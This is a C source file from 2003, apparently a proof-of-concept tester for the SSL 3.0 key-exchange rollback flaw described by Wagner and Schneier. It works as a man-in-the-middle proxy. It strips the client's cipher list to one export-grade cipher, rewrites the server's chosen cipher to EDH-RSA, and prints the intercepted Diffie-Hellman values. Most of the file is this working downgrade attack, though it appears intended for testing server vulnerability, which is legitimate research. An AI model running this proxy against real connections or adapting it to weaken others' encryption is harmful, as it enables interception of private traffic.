/* $Id$ */

/* SSLKeyExchangeAlgorithmRollbackCheck
 * Copyright (C) 2003 Jostein Tveit <josteitv@pvv.ntnu.no>
 *
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License version 2,
 * as published by the Free Software Foundation
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program; if not, write to the Free Software
 * Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
 */

/* 
 * This program is based on the vulnerability described in section 4.4 of 
 * "Analysis of the SSL 3.0 protocol" by David Wagner and Bruce Schneier.
 */

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
#include <openssl/bn.h>

#include "tcp_common.h"

#define NAME "SSLKeyExchangeAlgorithmRollbackCheck"
#define VERSION "0.1"

#define int_error(msg)  handle_error(__FILE__, __LINE__, msg)

/* macro to convert from array of two bytes to an int (long? unsigned?) */
#define n2s(c,s)        ((s=(((unsigned int)((c)[0]))<< 8)| \
                            (((unsigned int)((c)[1]))    )),(c)+=2)

#define s2n(s,c)        ((c[0]=(unsigned char)(((s)>> 8)&0xff), \
                          c[1]=(unsigned char)(((s)    )&0xff)),c+=2)


/* Macro to convert from array of three bytes to an unsigned long */
#define n2l3(c,l)       ((l =(((unsigned long)((c)[0]))<<16)| \
                             (((unsigned long)((c)[1]))<< 8)| \
                             (((unsigned long)((c)[2]))    )),(c)+=3)

#define l2n3(l,c)       ((c[0]=(unsigned char)(((l)>>16)&0xff), \
                          c[1]=(unsigned char)(((l)>> 8)&0xff), \
                          c[2]=(unsigned char)(((l)    )&0xff)),c+=3)


#define BUFLEN 6000
#define LISTENQ 10

void print_bytes(const unsigned char *ptr, const int len);
void handle_error(const char *file, int lineno, const char *msg);

int get_sslrecord(const int socket, unsigned char *buf, const int len);
void send_sslrecord(const int socket, const unsigned char *buf, const int len);

void process_handshake_msg(const int type, const int fromfd, const int tofd);

int alter_clienthello(unsigned char *buf, const int len);
int alter_serverhello(unsigned char *buf, const int len);
void save_clientkeyexchange(const unsigned char *buf, const int len);
void save_serverkeyexchange(const unsigned char *buf, const int len);

void usage(const char *progname);

enum {
  CLIENT_HELLO = 0,
  SERVER_HELLO,
  CERTIFICATE,
  SERVER_KEY_EXCHANGE,
  SERVER_HELLO_DONE,
  CLIENT_KEY_EXCHANGE,
  CHANGE_CIPHER_SPEC,
  FINISHED
};

int main(int argc, char *argv[])
{
  int clientfd, serverfd;
  char *progname;
  char *hostname;
  int port;

  progname = argv[0];

  if (argc != 3) {
    usage(progname);
    return EXIT_FAILURE;
  }    

  hostname = argv[1];
  port = atoi(argv[2]); /* FIXME */

  /* listen to socket for client to connect */
  if ((clientfd = tcp_listen(5001, LISTENQ)) < 0) {
    int_error("Error listen to socket");
  }

  /* open connection to SSL server */
  if ((serverfd = tcp_connect(hostname, port)) < 0) {
    int_error("Error connecting to SSL server");
  }
  printf("Connected to SSL server: %s:%d\n", hostname, port);

  process_handshake_msg(CLIENT_HELLO, clientfd, serverfd);

  process_handshake_msg(SERVER_HELLO, serverfd, clientfd);
  process_handshake_msg(CERTIFICATE, serverfd, clientfd);
  process_handshake_msg(SERVER_KEY_EXCHANGE, serverfd, clientfd);
  process_handshake_msg(SERVER_HELLO_DONE, serverfd, clientfd);

  process_handshake_msg(CLIENT_KEY_EXCHANGE, clientfd, serverfd);
  process_handshake_msg(CHANGE_CIPHER_SPEC, clientfd, serverfd);
  process_handshake_msg(FINISHED, clientfd, serverfd);

  process_handshake_msg(CHANGE_CIPHER_SPEC, serverfd, clientfd);
  process_handshake_msg(FINISHED, serverfd, clientfd);

  tcp_close(clientfd);
  tcp_close(serverfd);

  return 0;
}

void usage(const char *progname)
{
  printf("Usage: %s <hostname> <port>\n", progname);
}

void process_handshake_msg(const int type, const int fromfd, const int tofd)
{
  unsigned char buf[BUFLEN];
  int buflen, newlen;
  int handshaketype = 0;

  /* read SSL record */
  buflen = get_sslrecord(fromfd, buf, BUFLEN);

#ifdef DEBUG
  printf("Read SSL record:\n");
  print_bytes(buf, buflen);
#endif

  switch(type) {
  case CLIENT_HELLO:
    handshaketype = 1;
    break;
  case SERVER_HELLO:
    handshaketype = 2;
    break;
  case CERTIFICATE:
    handshaketype = 11;
    break;
  case SERVER_KEY_EXCHANGE:
    handshaketype = 12;
    break;
  case SERVER_HELLO_DONE:
    handshaketype = 14;
    break;
  case CLIENT_KEY_EXCHANGE:
    handshaketype = 16;
    break;
  case CHANGE_CIPHER_SPEC:
    /* do nothing */
    break;
  case FINISHED:
    handshaketype = 20;
    break;
  default:
    int_error("Unkown handshaketype");
  }

  if ( (type != CHANGE_CIPHER_SPEC) && (type != FINISHED) && 
       (buf[5] != handshaketype) ) {
    /* We do not have correct message type. Exit */
    printf("buf:\n");
    print_bytes(buf, buflen);
    printf("Incorrect message type. Got %i, should have gotten %i\n",
           buf[5], handshaketype);
    exit(-1);
  }
  if ( (type == CHANGE_CIPHER_SPEC) && (buf[0] != 20))
    int_error("message type is not correct");

#ifdef DEBUG
  printf("SSL handshaketype: %i\n", handshaketype);
#endif

  /* special handling of some of the messages */
  newlen = buflen;
  if (type == CLIENT_HELLO)
    newlen = alter_clienthello(buf, buflen);
  else if (type == SERVER_HELLO)
    newlen = alter_serverhello(buf, buflen);
  else if (type == CLIENT_KEY_EXCHANGE)
    save_clientkeyexchange(buf, buflen);
  else if (type == SERVER_KEY_EXCHANGE)
    save_serverkeyexchange(buf, buflen);

  /* send SSL record */
  send_sslrecord(tofd, buf, newlen);
#ifdef DEBUG
  printf("Wrote SSL record\n");
  print_bytes(buf, newlen);
#endif
}

int alter_clienthello(unsigned char *buf, const int len)
{
  /* change cipher suite list to only include EXP-DES.. and/or EXP-RC2... */

  int cipherlen, sslrecordlen, newsslrecordlen;
  unsigned long chlen, newchlen;
  unsigned char *ptr;
  unsigned char tmpbuf[BUFLEN];

  memcpy(tmpbuf, buf, 44);

  ptr = &buf[44];
  n2s(ptr, cipherlen);
  /* printf("cipherlen: %i\n", cipherlen); */

  /* set new length in SSL record header */
  ptr = &buf[3];
  n2s(ptr, sslrecordlen);
  /* printf("sslrecordlen: %i\n", sslrecordlen); */

  ptr = &tmpbuf[3];
  newsslrecordlen = sslrecordlen - (cipherlen - 2);
  s2n(newsslrecordlen, ptr);
  /* printf("newsslrecordlen: %i\n", newsslrecordlen);   */

  /* set new length in ClientHello header */
  ptr = &buf[6];
  n2l3(ptr, chlen);
  /* printf("clienthellolen: %li\n", chlen); */

  ptr = &tmpbuf[6];
  newchlen = chlen - (cipherlen - 2);
  l2n3(newchlen, ptr);
  /* printf("newchlen: %li\n", newchlen); */

  /* set ciphersuite.length to 2 bytes */
  tmpbuf[44] = 0x00;
  tmpbuf[45] = 0x02;

  /* set ciphersuite to EXP-DES-CBC-SHA */
  tmpbuf[46] = 0x00;
  tmpbuf[47] = 0x06; /* use 0x08 to test OpenSSL */

  /* set Compression.length to 1 and Compression.method to 0 */
  tmpbuf[48] = 0x01;
  tmpbuf[49] = 0x00;

  memcpy(buf, tmpbuf, 50);

  return 50;
}
int alter_serverhello(unsigned char *buf, const int len)
{
  /* change cipher to EDH-RSA-DES-CBC3-SHA (0x00 0x16) */
  buf[76] = 0x00;
  buf[77] = 0x16;

  return len;
}

void save_clientkeyexchange(const unsigned char *buf, const int len)
{
  /* save DH values */
  
  const unsigned char *ptr;
  int i;
  BIGNUM *dh_p, *dh_g, *dh_ys;

  dh_p = BN_new();
  dh_g = BN_new();
  dh_ys = BN_new();
  
  ptr = &buf[5];

  n2s(ptr, i);
  dh_p = BN_bin2bn(ptr, i, dh_p);
  ptr += i;

  n2s(ptr, i);
  dh_g = BN_bin2bn(ptr, i, dh_g);
  ptr += i;

  n2s(ptr, i);
  dh_ys = BN_bin2bn(ptr, i, dh_ys);
  ptr += i;

  printf("dh_p = %s\n", BN_bn2hex(dh_p));
  printf("dh_g = %s\n", BN_bn2hex(dh_g));
  printf("dh_ys = %s\n", BN_bn2hex(dh_ys));
  
}

void save_serverkeyexchange(const unsigned char *buf, const int len)
{
  /* Save RSA values */
  /* Not yet implemented */
}

void send_sslrecord(const int socket, const unsigned char *buf, const int len)
{
  if (tcp_write_bytes(socket, buf, len) != len) {
    int_error("Error writing to server");
  }
}

int get_sslrecord(const int socket, unsigned char *buf, const int len)
{
  /* first read the SSL record header. 
     Then extract the length and read the SSL record */
  int record_len;
  unsigned char *ptr;
  int bytes_read;

  int tmp;

  if (len < 5) {
    int_error("Buffer too small.\n");
  }

  ptr = &buf[0];
  if ((bytes_read = tcp_read_bytes(socket, buf, 5)) != 5) {
    int_error("error in reading header");
  }

  /*printf("ptr: %i\n", *ptr);*/

  if (*ptr==20 || *ptr==21 || *ptr==22 || *ptr==23) {
    /*
    printf("We got a SSL3/TLS1 record\n");
    printf("SSL Record header:\n");
    print_bytes(buf, bytes_read);
    */
    ptr = &buf[3];
    n2s(ptr, record_len);
  } else {
    printf("We got a SSL2 record (or a failure)\n");
    record_len = ((buf[0] & 0x7f) << 8) | buf[1];
    record_len -= 3; /* subtract 3 because we read 5 in the beginning */
    ptr+=2;
  }

  /*printf("length of SSL record is: %i\n", record_len);*/
  if (record_len > (len - bytes_read)) {
    int_error("buffer too small\n");
  }

  if ((tmp=tcp_read_bytes(socket, buf+bytes_read, record_len)) != record_len) {
    printf("tmp = %i\n", tmp);
    int_error("did not read expected record length");
  }
  bytes_read += record_len;
  /*
  printf("SSL Record:\n");
  print_bytes(buf, bytes_read);
  */
  return bytes_read;
}

/* 
 * Function to print len number of bytes from ptr
 */
void print_bytes(const unsigned char *ptr, const int len)
{
  int i;

  for (i = 0; i < len; i++) {
    printf("0x%02x ", ptr[i]);
  }
  printf("\n");
}

void handle_error(const char *file, int lineno, const char *msg)
{
  fprintf(stderr, "** %s:%i %s\n", file, lineno, msg);
  exit(-1);
}
